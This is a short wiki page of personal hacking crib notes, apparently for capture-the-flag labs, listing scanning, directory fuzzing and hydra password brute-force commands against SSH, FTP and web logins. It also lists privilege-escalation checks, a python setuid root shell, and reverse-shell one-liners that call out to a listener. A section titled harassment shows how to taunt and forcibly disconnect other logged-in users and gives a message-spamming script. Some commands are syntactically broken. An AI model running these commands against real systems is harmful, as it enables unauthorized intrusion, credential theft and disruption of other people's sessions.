Difference between revisions of "Enumeration"
(Created page with "NMAP the IP address, and perform servide scan. GOBUSTER each IP address and port. HASH-IDENTIFIER any hashes found. !! IF ACCESS GAINED !! CHECK /etc/password CHECK /etc/...") |
(No difference)
|
Revision as of 21:47, 11 November 2020
NMAP the IP address, and perform servide scan.
GOBUSTER each IP address and port.
HASH-IDENTIFIER any hashes found.
!! IF ACCESS GAINED !!
CHECK /etc/password
CHECK /etc/crontab
*** STEGONAGRAPHY ***
steghide extract -sf <filename>
stegcrack <filename> <wordlist>
ffuf -w /usr/share/wordlists/common.txt -u http://0.0.0.0/FUZZ -t 120
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.210.9/hidden
nmap -sS -A 10.10.210.9
hydra -L /home/user/hackerlist.txt -P /usr/share/wordlists/passlist.txt 10.10.210.9 ssh
hydra -L /home/user/hackerlist.txt -P /usr/share/wordlists/rockyou.txt ftp://10.10.210.9
hydra -L /home/user/hackerlist.txt -P /usr/share/wordlists/passlist.txt 10.10.210.9 http-post-form "/api/user/login:username=^USER^&password=^PASS^:F=incorrect" -V
linpeas if access to linux machine
***
ALWAYS TRY TO RUN 'sudo -l'
For every user: find / -type f -perm -u=s 2>/dev/null; getcap -r / 2>/dev/null
/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
****
***
ALWAYS 'sudo -l' IF YOU GAIN ACCESS
SEE IF YOU CAN FIND /BIN/BASH or /BIN/SH for ESCALATION WITH "NOPASSSWD"
***
***
REVERSE SHELLS
php -r $sock=fsockopen(“192.168.0.195”,4444);exec(“/bin/sh -i <&3 >&3 2>&3”);’
bash -i >& /dev/tcp/0.0.0.0/1234 0>&1
***
***
SHOW ALL OTHER CONNECTIONS
netstat -natp
***
** HARASSMENT **
There's probably an easier way, but I do this:
See who's logged into your machine -- use who or w:
> who
mmrozek tty1 Aug 17 10:03
mmrozek pts/3 Aug 17 10:09 (:pts/2:S.0)
Look up the process ID of the shell their TTY is connected to:
> ps t
PID TTY STAT TIME COMMAND
30737 pts/3 Ss 0:00 zsh
Laugh at their impending disconnection (this step is optional, but encouraged)
> echo "HAHAHAHAHAHAHAHA" | write mmrozek pts/3
Kill the corresponding process:
> kill -9 30737
HARASSMENT SCRIPT
#!/bin/bash/
while True
Do
echo '' | write username pta/?
Done
*** ONE LINER REVERSE SHELLS ***
https://github.com/infosec-au/fuzzdb/blob/master/attack-payloads/os-cmd-execution/reverse-shell-one-liners.doc.txt
**SHOW IPS ON MACHIINE***
netstat -natlp
(kick them off with [kill -9 PID] after finding PID with [netstat -np | grep PORT])